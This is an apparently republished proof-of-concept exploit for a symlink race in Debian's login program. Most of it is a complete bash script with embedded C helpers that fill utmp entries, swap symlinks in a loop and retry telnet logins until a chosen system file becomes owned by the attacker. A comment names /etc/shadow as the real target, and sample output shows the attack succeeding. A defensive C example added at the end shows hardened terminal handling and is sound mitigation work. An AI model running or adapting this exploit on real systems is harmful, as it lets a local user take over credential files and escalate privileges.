Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC
Source: www.vfcocus.net  Author: Paul Szabo  Published: 2008-12-02
#!/bin/bash -

echo '
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <utmp.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
  struct utmp entry;
  int i;

  entry.ut_type=LOGIN_PROCESS;
  strcpy(entry.ut_line,"/tmp/x");
  entry.ut_time=0;
  strcpy(entry.ut_user,"badguy");
  strcpy(entry.ut_host,"badhost");
  entry.ut_addr=0;
  for(i=1;i<9;i++) {
    entry.ut_pid=(pid_t)( i + (int)getpid() );
    sprintf(entry.ut_id,"bad%d",i);
    pututline(&entry);
  }
}
' > /tmp/fillutmp.c

cc -o /tmp/fillutmp /tmp/fillutmp.c

echo 'Ask someone with group utmp privileges to do:'
echo '  chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
echo -n 'Press [RETURN] to continue... '
read ANS

echo '
#include <unistd.h>

int main(int argc, char *argv[])
{
  while(1)
  {
    unlink("/tmp/x");
    symlink(argv[1],"/tmp/x");
    unlink("/tmp/x");
    symlink(argv[2],"/tmp/x");
  }
}
' > /tmp/jigglelnk.c

cc -o /tmp/jigglelnk /tmp/jigglelnk.c

HOST=`hostname` # or simply localhost?
echo "Which tty do you think a 'telnet $HOST' will use next?"
echo "(Do that telnet and see...)"
read TTY
echo "You said it will be '$TTY' ..."

ATK=/etc/debian_version # should be /etc/shadow

echo "Starting symlink re-jiggler ..."
/tmp/jigglelnk $TTY $ATK &
JIG=$!

LOOP=0
while :; do
  ((LOOP = $LOOP + 1))
  echo; echo; echo "Try = $LOOP"

  /tmp/fillutmp

  echo "Telnetting... if login succeeds, just exit for next try..."
  /usr/bin/telnet $HOST

  LS=`ls -ld $ATK`
  case "$LS" in
    *root*root* ) ;; # not done yet...
    * )
      echo; echo
      echo "Success after $LOOP tries!"
      echo "$LS"
      echo; echo
      break
    ;;
  esac
done

kill $JIG
rm /tmp/fillutmp /tmp/jigglelnk /tmp/x

# ...
# ~$ logout
# Connection closed by foreign host.
# Success after 12 tries!
# -rw------- 1 psz tty 4 Oct 28  2006 /etc/debian_version
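
Defensive counterpart to the PoC above, added here and not part of the original post or of Debian's login: the script depends on a privileged program changing ownership of whatever path a utmp line names while a symlink at that path is being swapped. Assuming that pattern, this C example (function names are hypothetical) resolves the line only inside a trusted device directory, refuses symlinks and non-character-devices, and changes ownership through the open descriptor instead of the path.

```c
#define _GNU_SOURCE  /* O_NOFOLLOW, O_DIRECTORY, openat */
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (added example): open terminal `line` (e.g. "pts/3")
 * relative to the trusted directory `devdir` (normally "/dev").
 * Returns an fd on success, -1 with errno set on refusal. */
int open_line_checked(const char *devdir, const char *line)
{
    struct stat st;
    int dfd, fd;
    /* A utmp line is a name under /dev: never absolute, never climbing. */
    if (line[0] == '\0' || line[0] == '/' || strstr(line, "..") != NULL) {
        errno = EINVAL;
        return -1;
    }
    dfd = open(devdir, O_RDONLY | O_DIRECTORY);
    if (dfd < 0)
        return -1;
    /* O_NOFOLLOW: fail with ELOOP if the final component is a symlink.
     * O_NOCTTY/O_NONBLOCK: no controlling tty, no wait for carrier. */
    fd = openat(dfd, line, O_RDWR | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK);
    close(dfd);
    if (fd < 0)
        return -1;
    /* Judge the object that was opened, not the name it had. */
    if (fstat(fd, &st) != 0 || !S_ISCHR(st.st_mode)) {
        close(fd);
        errno = ENOTTY;
        return -1;
    }
    return fd;
}

/* Hypothetical helper: hand the terminal to a user through the descriptor,
 * so swapping the path afterwards cannot redirect the ownership change. */
int give_line_to_user(const char *devdir, const char *line,
                      uid_t uid, gid_t gid, mode_t mode)
{
    int fd = open_line_checked(devdir, line), rc;
    if (fd < 0)
        return -1;
    rc = (fchown(fd, uid, gid) == 0 && fchmod(fd, mode) == 0) ? 0 : -1;
    close(fd);
    return rc;
}
```

The "/tmp/x" line written by fillutmp is rejected by the first check, and a symlink planted inside the device directory is rejected by O_NOFOLLOW.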